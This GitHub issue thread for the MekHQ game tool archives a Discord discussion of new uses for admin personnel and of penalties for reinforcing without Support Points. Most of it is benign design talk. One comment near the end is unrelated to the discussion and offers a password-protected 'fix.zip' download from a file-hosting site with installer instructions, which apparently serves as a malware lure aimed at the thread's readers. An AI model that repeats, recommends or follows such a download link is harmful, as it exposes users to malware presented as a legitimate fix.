### ISSUE TITLE
RFE; Admin and Reinforcements, conversation archived for @Illiani

### ISSUE THREAD

**Issue by DynamicWorlds** [MegaMek/mekhq#4733]
Thom293 — 08/26/2024 9:21 PM
@Illiani meant to reply to this earlier.  Perhaps an option to start a contract with a Single SP (not VP) might be a worthwhile idea?  The start of contract is the most deadly time.  having an optional single SP to starts (some?) contracts for emergency reinforcements might help some.

Algebro — 08/26/2024 9:23 PM
I've noticed those first couple scenarios without SP are savage

Algebro — 08/26/2024 9:27 PM
Maybe starting sp based on something the player does, like strategy skill level or something

Illiani — 08/26/2024 9:27 PM
I was thinking the same

Algebro — 08/26/2024 9:28 PM
Would be good to have command admins have a use in stratcon outside of negotiating contracts

Gryphon — 08/26/2024 9:29 PM
could possibly have it use the strategy skill OF admin personel to give them more things to spend XP on

Illiani — 08/26/2024 9:29 PM
There is definitely mileage here

Algebro — 08/26/2024 9:30 PM
Transport admins could help with reducing deployment times or something (like tracks where deploying to hexes takes 3 turns or whatever)
I think it's command and transport that don't do anything

Illiani — 08/26/2024 9:31 PM
I believe lance leader tactics influences reinforcement times atm
That or Strategy
Illiani — 08/26/2024 9:31 PM
But I don’t see being able to double-up on reinforcement reduction to be a wholly bad thing
I would really like to see Command Admin get more use

Algebro — 08/26/2024 9:32 PM
That's reinforcing
Some tracks take multiple days to scout hexes and come back or whatever

Illiani — 08/26/2024 9:33 PM
Yes, I see what you mean now
Admin/Transport would be great for that

Illiani — 08/26/2024 9:33 PM
So Admin/Command for starting SP; Transport for deployment/return times
Logistics I would like to have it so that only logistics admins get to roll for acquisition (or Techs, if that’s enabled). That’s a change I’ve had planned for a while

Monky — 08/26/2024 9:37 PM
nice
HR for recruitment of prisoners/thwarting contract breach by employer?

Illiani — 08/26/2024 9:38 PM
I have secret plans for HR

Monky — 08/26/2024 9:38 PM
or dealing with 'disloyalty' in a professional productive way

Gryphon — 08/26/2024 9:39 PM
yeah, I use scrounge and put all my people with scrounge into admin, logistics, but that's just me making the system make more sense to me.  It would be good for logistics to handle aquisitions officially

Illiani — 08/26/2024 9:40 PM
Scrounge might not be long for this world. I want to do a sweep of our skills and bring them up to current rules. There are a couple in there from the old MechWarrior rpg from the 80s that have been since replaced

RaozSpaz — 08/26/2024 10:33 PM
Replying to the reinforcement topic of starting with SP. Sounds like a not terrible idea. Typically you can always reinforce, but the chance factors attached to reinforcing without SP are just really bad [not to mention make 0 sense].

RaozSpaz — 08/26/2024 10:45 PM
Yeah. I will never understand the random chance for more bad stuff when you do a non SP reinforce. I understand if it was a chance to fail [they arent ready in time or whatever] but causing the player more problems. How? Why?

Algebro — 08/26/2024 10:54 PM
I like how it forces you to decide whether to risk making things worse but it doesn't make a lot of sense logically 
If reinforcing without sp just had a chance to not work then you wouldn't really have an incentive to not just reinforce constantly

Algebro — 08/26/2024 10:58 PM
I don't think it necessarily needs to stay how it is but I do think there should be risk or some other cost, at least that has made for some really interesting decisions in my contracts 
I normally used to never make my scout lances try and win without reinforcements but now ive had to a couple times

Thom293 — 08/26/2024 11:00 PM
Best feeling  in the world to win an outmatched battle with just a scout lance.

RaozSpaz — 08/26/2024 11:32 PM
I mean there are plenty of risk factors that aren't "Suddenly the opfor got bigger somehow"
Intercepted - Generate another battle using the reinforcing lance
Sidetracked - Greatly delay the reinforcing time for the unit
Mishap - Your reinforcement group deploys onto the region like normal, but fails to properly reinforce [will return after the deployment window like normal]
Bait and Switch - Your OpFor has flipped the engagement onto your reinforcements. The contract resets with your reinforcing lance being the primary lance, and all other assigned units now reinforcing it instead.
Logistical Failure - Your reinforcements fail and all other reinforcements are removed from the engagement.

Obviously some of these would be ridiculous to code, but some examples of 'non larger opfor' penalties.

Gryphon — 08/26/2024 11:44 PM
Re: intercepted.  Isn't there a battle type that amounts to "get across this battlefield with minimal losses within X timeframe"?

RaozSpaz — 08/26/2024 11:45 PM
Yeah. Breakthrough
If we had the ability to do lead up missions would be a great option
But we dont have that quite yet

Illiani — 08/26/2024 11:48 PM
The random extra modifiers are meant to represent the OpFor detecting your reinforcements and sending reinforcements of their own

Illiani — 08/26/2024 11:49 PM
I do like the idea of reinforcements getting intercepted on a failed roll, though. I think that would be really cool
I do need to learn how to initiate scenarios from within mhq…

RaozSpaz — 08/26/2024 11:50 PM
The prequel to learning how to do chain scenarios 😄

Illiani — 08/26/2024 11:50 PM
Mutinies, actually

Illiani — Yesterday at 12:00 AM
If I were to implement it, I think there would be four possible outcomes to reinforcing without SP:

reinforcement successful
delayed: successful, but with delayed arrival time
unsuccessful: the force is unavailable as if they had participated to the battle, but don’t arrive in time to do any actual fighting
interception: a new battle is spawned with the reinforcement force assigned to it
The easiest way to implement ‘unsuccessful’ would be to just have it identical to delayed, but increase the arrival time to something like 30 turns. So potentially they could still arrive just not any time soon
Honestly, the only difficulty here would be interception and that’s not impossible, I just don’t personally know how to do it yet

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IllianiCBT** [comment]
Closing as resolved
